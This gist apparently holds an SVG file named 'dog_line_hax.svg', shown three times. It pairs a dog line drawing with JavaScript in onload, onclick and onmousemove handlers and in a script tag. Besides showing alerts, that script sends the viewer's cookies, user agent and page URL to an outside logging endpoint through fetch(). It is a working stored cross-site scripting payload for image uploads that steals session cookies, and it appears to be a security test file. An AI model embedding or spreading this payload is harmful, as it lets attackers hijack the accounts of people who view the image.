cianmce/dog_line_hax.svg

## dog_line_hax.svg
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg onclick="alert('svg clicked - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);" onload="alert('svg load - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);" onmousemove="alert('svg mousemove - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);" xmlns='http://www.w3.org/2000/svg' viewBox='0 0 1000 1000'>
    <script type="text/javascript">
      // <![CDATA[
        alert('svg script tag - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);
      // ]]>
    </script>
    <path onclick="alert('path clicked')" onload="alert('path load - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href)" onmousemove="alert('path mousemove - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);"
    d='M500,990c-113.1,0-219.5-42.7-299.5-120.1C120.4,792.4,76.3,689.3,76.3,579.6c0-77,20.8-151.1,60.1-214.4c5-8,8.4-17,11.9-26.6c5.2-14,10.7-28.4,21.6-40.2c11.8-12.7,28.5-21.5,44.8-30.1c10.1-5.4,19.7-10.4,27.7-16.1c21.4-15.4,44.6-28.9,68.9-40.1c5.3-6.3,3.5-44.8,2.3-70.4c-2.5-52.1-5-105.9,15.9-126.3c3.6-3.5,8.2-5.3,13.2-5.3c16.2,0,39.1,20.8,68,61.7c21,29.8,40.3,63.9,43.1,75.9c1.5,6.7,14.1,20.9,20.2,22.6c0,0,0.4,0.1,1.6,0.1c1.8,0,4.4-0.2,7.4-0.4c4.6-0.3,10.4-0.7,17.2-0.7c23.9,0,46.5,5.8,68.3,11.4c20.7,5.3,40.3,10.3,60,10.3c0,0,0,0,0,0c1.9,0,3.8,0,5.7-0.1c2.9-0.2,11.6-4.3,16.1-7.7c14.3-10.7,35.9-34.2,58.8-59.1c48.4-52.5,79.2-84.4,99.6-84.4c5.9,0,11,2.6,14.3,7.4c10.8,15.5,15.2,26.9,17.3,45.2c0.2,2,0.5,4.2,0.8,6.7c3.8,29.6,11.8,91-15.7,172.7c1.3,10.6,5.7,34.5,13.1,44.1c51.9,66.9,85.4,170.6,85.4,264.1c0,109.7-44.1,212.8-124.2,290.3C719.5,947.3,613.1,990,500,990z M342.7,27.7c-0.5,0-0.6,0.1-0.9,0.3c-15.3,14.8-12.6,71.4-10.6,112.8c2.5,52.4,3.1,80.1-12.2,87.1c-23.4,10.8-45.8,23.8-66.4,38.6c-8.9,6.4-19.5,12-29.8,17.4c-14.9,7.9-30.3,16-40.1,26.5c-8.6,9.2-13.2,21.5-18,34.4c-3.7,9.9-7.6,20.2-13.5,29.7C113.8,435,93.9,505.9,93.9,579.6c0,216.6,182.2,392.7,406.1,392.7c223.9,0,406.1-176.2,406.1-392.7c0-89.8-32.1-189.2-81.7-253.2c-12.4-16-16.5-51-16.9-54.9l-0.2-2l0.6-1.9c27-78.8,19.3-138.1,15.6-166.7c-0.3-2.5-0.6-4.8-0.9-6.9c-1.8-15.3-5.1-24-14.1-37c-14.2,0.2-57.7,47.4-86.5,78.7c-23.5,25.5-45.7,49.6-61.2,61.3c-4.4,3.3-17.1,10.8-25.8,11.2c-2.2,0.1-4.4,0.2-6.6,0.2c0,0,0,0,0,0c-21.9,0-43.5-5.5-64.4-10.9c-20.8-5.3-42.3-10.8-63.9-10.8c-6.1,0-11.6,0.4-16,0.7c-3.3,0.2-6.1,0.4-8.6,0.4c-2.7,0-4.7-0.2-6.5-0.8c-13.2-3.9-29.7-23.7-32.4-35.7c-1.7-7.5-18.2-38.3-40.3-69.6C366,39.1,348.4,27.7,342.7,27.7z M257.7,631.2c5.6-1.9,26.2-1.9-2.3-32c38.7,42.9,119-51.7,13-81.7c-28.5-8.1-107.7-5.2-96.4,46.1c2.3,5.3,26.7,27.8,27.4,25.6c-31.6-4.7-10.5,41.7,21.8,45.8C227.4,635.9,251.7,633.3,257.7,631.2z M259.5,690.9c-56.8-39.8-113.9,12.8-55.1,34.5c41.7,15.4,46.7,8,84.5,14c25.3,4,171,11.8,173.5-33.5c-6,0.5-0.7,12,0,0c-44.9,4.1-91.3,13.6-110.8,17.4c-14.5,2.8-29.6-12.3-47.7-18.5L259.5,690.9z M515.4,397.6c39.5-2.3,72.6,48.1,72.6,48.1s-33.1,53-69.2,51.9c-36.1-1.1-34.5-13.9-59.8-19.9C433.8,471.6,475.9,399.8,515.4,397.6z M504.2,422.8c5.4-7,20.1,21,22.2,2.2c0.8-6.4-1.5-9.4-25.9-9c-24.4,0.4-35.3,53.2-19.9,62c11.9,6.8,20.5,18.4,16.8,3.4C494.2,468.9,496.3,433.1,504.2,422.8z M261.5,353.7c30.1,0,39.9,19.6,40.6,30.5c0.8,10.9-18.8,53.8-38.4,53.8c-9.2,0-33.6-12.8-36.1-32.5C224.9,383.2,245.6,353.7,261.5,353.7z M257.4,366.9c5.6-8.1-21.6,5.7-19.7,30.6c1.9,24.8,27.3,36,21.7,28.4c-20.5-27.9-5.4-63.9-10.9-53.6c5.5,4.2,17.2-4.8,4-7C251.7,365.1,256.9,367.6,257.4,366.9z M289.2,373.8c-3,0-5.4,2.6-5.4,5.8c0,3.2,2.4,5.8,5.4,5.8c3,0,5.5-2.6,5.5-5.8C294.6,376.4,292.2,373.8,289.2,373.8z'
    />
</svg>

## dog_line_hax.svg.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg onclick="alert('svg clicked - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);" onload="alert('svg load - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);" onmousemove="alert('svg mousemove - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);" xmlns='http://www.w3.org/2000/svg' viewBox='0 0 1000 1000'>
    <script type="text/javascript">
      // <![CDATA[
        alert('svg script tag - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);
      // ]]>
    </script>
    <path onclick="alert('path clicked')" onload="alert('path load - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href)" onmousemove="alert('path mousemove - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);"
    d='M500,990c-113.1,0-219.5-42.7-299.5-120.1C120.4,792.4,76.3,689.3,76.3,579.6c0-77,20.8-151.1,60.1-214.4c5-8,8.4-17,11.9-26.6c5.2-14,10.7-28.4,21.6-40.2c11.8-12.7,28.5-21.5,44.8-30.1c10.1-5.4,19.7-10.4,27.7-16.1c21.4-15.4,44.6-28.9,68.9-40.1c5.3-6.3,3.5-44.8,2.3-70.4c-2.5-52.1-5-105.9,15.9-126.3c3.6-3.5,8.2-5.3,13.2-5.3c16.2,0,39.1,20.8,68,61.7c21,29.8,40.3,63.9,43.1,75.9c1.5,6.7,14.1,20.9,20.2,22.6c0,0,0.4,0.1,1.6,0.1c1.8,0,4.4-0.2,7.4-0.4c4.6-0.3,10.4-0.7,17.2-0.7c23.9,0,46.5,5.8,68.3,11.4c20.7,5.3,40.3,10.3,60,10.3c0,0,0,0,0,0c1.9,0,3.8,0,5.7-0.1c2.9-0.2,11.6-4.3,16.1-7.7c14.3-10.7,35.9-34.2,58.8-59.1c48.4-52.5,79.2-84.4,99.6-84.4c5.9,0,11,2.6,14.3,7.4c10.8,15.5,15.2,26.9,17.3,45.2c0.2,2,0.5,4.2,0.8,6.7c3.8,29.6,11.8,91-15.7,172.7c1.3,10.6,5.7,34.5,13.1,44.1c51.9,66.9,85.4,170.6,85.4,264.1c0,109.7-44.1,212.8-124.2,290.3C719.5,947.3,613.1,990,500,990z M342.7,27.7c-0.5,0-0.6,0.1-0.9,0.3c-15.3,14.8-12.6,71.4-10.6,112.8c2.5,52.4,3.1,80.1-12.2,87.1c-23.4,10.8-45.8,23.8-66.4,38.6c-8.9,6.4-19.5,12-29.8,17.4c-14.9,7.9-30.3,16-40.1,26.5c-8.6,9.2-13.2,21.5-18,34.4c-3.7,9.9-7.6,20.2-13.5,29.7C113.8,435,93.9,505.9,93.9,579.6c0,216.6,182.2,392.7,406.1,392.7c223.9,0,406.1-176.2,406.1-392.7c0-89.8-32.1-189.2-81.7-253.2c-12.4-16-16.5-51-16.9-54.9l-0.2-2l0.6-1.9c27-78.8,19.3-138.1,15.6-166.7c-0.3-2.5-0.6-4.8-0.9-6.9c-1.8-15.3-5.1-24-14.1-37c-14.2,0.2-57.7,47.4-86.5,78.7c-23.5,25.5-45.7,49.6-61.2,61.3c-4.4,3.3-17.1,10.8-25.8,11.2c-2.2,0.1-4.4,0.2-6.6,0.2c0,0,0,0,0,0c-21.9,0-43.5-5.5-64.4-10.9c-20.8-5.3-42.3-10.8-63.9-10.8c-6.1,0-11.6,0.4-16,0.7c-3.3,0.2-6.1,0.4-8.6,0.4c-2.7,0-4.7-0.2-6.5-0.8c-13.2-3.9-29.7-23.7-32.4-35.7c-1.7-7.5-18.2-38.3-40.3-69.6C366,39.1,348.4,27.7,342.7,27.7z M257.7,631.2c5.6-1.9,26.2-1.9-2.3-32c38.7,42.9,119-51.7,13-81.7c-28.5-8.1-107.7-5.2-96.4,46.1c2.3,5.3,26.7,27.8,27.4,25.6c-31.6-4.7-10.5,41.7,21.8,45.8C227.4,635.9,251.7,633.3,257.7,631.2z M259.5,690.9c-56.8-39.8-113.9,12.8-55.1,34.5c41.7,15.4,46.7,8,84.5,14c25.3,4,171,11.8,173.5-33.5c-6,0.5-0.7,12,0,0c-44.9,4.1-91.3,13.6-110.8,17.4c-14.5,2.8-29.6-12.3-47.7-18.5L259.5,690.9z M515.4,397.6c39.5-2.3,72.6,48.1,72.6,48.1s-33.1,53-69.2,51.9c-36.1-1.1-34.5-13.9-59.8-19.9C433.8,471.6,475.9,399.8,515.4,397.6z M504.2,422.8c5.4-7,20.1,21,22.2,2.2c0.8-6.4-1.5-9.4-25.9-9c-24.4,0.4-35.3,53.2-19.9,62c11.9,6.8,20.5,18.4,16.8,3.4C494.2,468.9,496.3,433.1,504.2,422.8z M261.5,353.7c30.1,0,39.9,19.6,40.6,30.5c0.8,10.9-18.8,53.8-38.4,53.8c-9.2,0-33.6-12.8-36.1-32.5C224.9,383.2,245.6,353.7,261.5,353.7z M257.4,366.9c5.6-8.1-21.6,5.7-19.7,30.6c1.9,24.8,27.3,36,21.7,28.4c-20.5-27.9-5.4-63.9-10.9-53.6c5.5,4.2,17.2-4.8,4-7C251.7,365.1,256.9,367.6,257.4,366.9z M289.2,373.8c-3,0-5.4,2.6-5.4,5.8c0,3.2,2.4,5.8,5.4,5.8c3,0,5.5-2.6,5.5-5.8C294.6,376.4,292.2,373.8,289.2,373.8z'
    />
</svg>
	<?xml version="1.0" encoding="utf-8"?>
	<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
	<svg onclick="alert('svg clicked - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);" onload="alert('svg load - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);" onmousemove="alert('svg mousemove - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);" xmlns='http://www.w3.org/2000/svg' viewBox='0 0 1000 1000'>
	<script type="text/javascript">
	// <![CDATA[
	alert('svg script tag - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);
	// ]]>
	</script>
	<path onclick="alert('path clicked')" onload="alert('path load - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href)" onmousemove="alert('path mousemove - cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href); fetch('https://ciancode.com/dev/logging/log_params.php?cookie='+document.cookie+String.fromCharCode(38)+'user_agent='+navigator.userAgent+String.fromCharCode(38)+'location='+location.href);"
	d='M500,990c-113.1,0-219.5-42.7-299.5-120.1C120.4,792.4,76.3,689.3,76.3,579.6c0-77,20.8-151.1,60.1-214.4c5-8,8.4-17,11.9-26.6c5.2-14,10.7-28.4,21.6-40.2c11.8-12.7,28.5-21.5,44.8-30.1c10.1-5.4,19.7-10.4,27.7-16.1c21.4-15.4,44.6-28.9,68.9-40.1c5.3-6.3,3.5-44.8,2.3-70.4c-2.5-52.1-5-105.9,15.9-126.3c3.6-3.5,8.2-5.3,13.2-5.3c16.2,0,39.1,20.8,68,61.7c21,29.8,40.3,63.9,43.1,75.9c1.5,6.7,14.1,20.9,20.2,22.6c0,0,0.4,0.1,1.6,0.1c1.8,0,4.4-0.2,7.4-0.4c4.6-0.3,10.4-0.7,17.2-0.7c23.9,0,46.5,5.8,68.3,11.4c20.7,5.3,40.3,10.3,60,10.3c0,0,0,0,0,0c1.9,0,3.8,0,5.7-0.1c2.9-0.2,11.6-4.3,16.1-7.7c14.3-10.7,35.9-34.2,58.8-59.1c48.4-52.5,79.2-84.4,99.6-84.4c5.9,0,11,2.6,14.3,7.4c10.8,15.5,15.2,26.9,17.3,45.2c0.2,2,0.5,4.2,0.8,6.7c3.8,29.6,11.8,91-15.7,172.7c1.3,10.6,5.7,34.5,13.1,44.1c51.9,66.9,85.4,170.6,85.4,264.1c0,109.7-44.1,212.8-124.2,290.3C719.5,947.3,613.1,990,500,990z M342.7,27.7c-0.5,0-0.6,0.1-0.9,0.3c-15.3,14.8-12.6,71.4-10.6,112.8c2.5,52.4,3.1,80.1-12.2,87.1c-23.4,10.8-45.8,23.8-66.4,38.6c-8.9,6.4-19.5,12-29.8,17.4c-14.9,7.9-30.3,16-40.1,26.5c-8.6,9.2-13.2,21.5-18,34.4c-3.7,9.9-7.6,20.2-13.5,29.7C113.8,435,93.9,505.9,93.9,579.6c0,216.6,182.2,392.7,406.1,392.7c223.9,0,406.1-176.2,406.1-392.7c0-89.8-32.1-189.2-81.7-253.2c-12.4-16-16.5-51-16.9-54.9l-0.2-2l0.6-1.9c27-78.8,19.3-138.1,15.6-166.7c-0.3-2.5-0.6-4.8-0.9-6.9c-1.8-15.3-5.1-24-14.1-37c-14.2,0.2-57.7,47.4-86.5,78.7c-23.5,25.5-45.7,49.6-61.2,61.3c-4.4,3.3-17.1,10.8-25.8,11.2c-2.2,0.1-4.4,0.2-6.6,0.2c0,0,0,0,0,0c-21.9,0-43.5-5.5-64.4-10.9c-20.8-5.3-42.3-10.8-63.9-10.8c-6.1,0-11.6,0.4-16,0.7c-3.3,0.2-6.1,0.4-8.6,0.4c-2.7,0-4.7-0.2-6.5-0.8c-13.2-3.9-29.7-23.7-32.4-35.7c-1.7-7.5-18.2-38.3-40.3-69.6C366,39.1,348.4,27.7,342.7,27.7z M257.7,631.2c5.6-1.9,26.2-1.9-2.3-32c38.7,42.9,119-51.7,13-81.7c-28.5-8.1-107.7-5.2-96.4,46.1c2.3,5.3,26.7,27.8,27.4,25.6c-31.6-4.7-10.5,41.7,21.8,45.8C227.4,635.9,251.7,633.3,257.7,631.2z M259.5,690.9c-56.8-39.8-113.9,12.8-55.1,34.5c41.7,15.4,46.7,8,84.5,14c25.3,4,171,11.8,173.5-33.5c-6,0.5-0.7,12,0,0c-44.9,4.1-91.3,13.6-110.8,17.4c-14.5,2.8-29.6-12.3-47.7-18.5L259.5,690.9z M515.4,397.6c39.5-2.3,72.6,48.1,72.6,48.1s-33.1,53-69.2,51.9c-36.1-1.1-34.5-13.9-59.8-19.9C433.8,471.6,475.9,399.8,515.4,397.6z M504.2,422.8c5.4-7,20.1,21,22.2,2.2c0.8-6.4-1.5-9.4-25.9-9c-24.4,0.4-35.3,53.2-19.9,62c11.9,6.8,20.5,18.4,16.8,3.4C494.2,468.9,496.3,433.1,504.2,422.8z M261.5,353.7c30.1,0,39.9,19.6,40.6,30.5c0.8,10.9-18.8,53.8-38.4,53.8c-9.2,0-33.6-12.8-36.1-32.5C224.9,383.2,245.6,353.7,261.5,353.7z M257.4,366.9c5.6-8.1-21.6,5.7-19.7,30.6c1.9,24.8,27.3,36,21.7,28.4c-20.5-27.9-5.4-63.9-10.9-53.6c5.5,4.2,17.2-4.8,4-7C251.7,365.1,256.9,367.6,257.4,366.9z M289.2,373.8c-3,0-5.4,2.6-5.4,5.8c0,3.2,2.4,5.8,5.4,5.8c3,0,5.5-2.6,5.5-5.8C294.6,376.4,292.2,373.8,289.2,373.8z'
	/>
	</svg>